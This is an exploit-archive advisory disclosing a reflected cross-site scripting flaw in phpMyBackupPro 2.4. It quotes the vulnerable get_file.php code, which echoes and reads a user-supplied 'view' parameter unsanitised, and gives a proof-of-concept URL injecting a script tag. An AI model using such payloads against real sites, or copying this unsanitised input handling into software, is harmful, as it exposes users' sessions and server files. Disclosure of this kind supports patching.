phpMyBackupPro-2.4 Cross-Site Scripting vulnerability

2014-05-05T00:00:00
ID SECURITYVULNS:DOC:30672
Type securityvulns
Reporter Securityvulns
Modified 2014-05-05T00:00:00

Description

phpmybackuppro Cross-Site Scripting vulnerability

@@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@

@@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@

@@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@

@@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@

@@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@

@@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@

@@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@

@@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@

@@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@

Exploit Title : phpMyBackupPro-2.4 Cross-Site Scripting vulnerability

Author : Iranian Exploit DataBase

Discovered By : IeDb

Email : iedb.team@gmail.com - o0_shabgard_0o@yahoo.com

Home : Www.IeDb.Ir/acc - Www.IrIsT.Ir

Fb Page : https://www.facebook.com/iedb.ir

Software Link : http://www.phpmybackuppro.net/download.php

Version : 2.4

Security Risk : Low

Tested on : Windows

Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR - F@riD - N20 - Bl4ck N3T - 0x0ptim0us - 0Day

E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - Mr.Zer0 - one alone hacker

DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda - C0dex - Dj.TiniVini

Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc

Source :

if (isset($_GET['view']) && file_exists($_GET['view'])) { if (isset($_GET['download'])) { header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename=".basename($_GET['view'])); readfile($_GET['view']); } else { echo "<pre>"; while($line=PMBP_getln($_GET['view'])) echo htmlentities($line); PMBP_getln($_GET['view'],true); echo "</pre>"; } } else { if (isset($_GET['view'])) echo $_GET['view']." ".F_MAIL_3."!"; }

Bug :

http://127.0.0.1/phpMyBackupPro/get_file.php?view="><script>alert(/IeDb.Ir/)</script>

Dem0 :

http://iedb.ir/up/imagef-13924803543531-jpg.html

Tnx To : All Member In Iedb.ir/acc & Iranian Hackers

Exploit Archive = http://www.iedb.ir/exploits-1350.html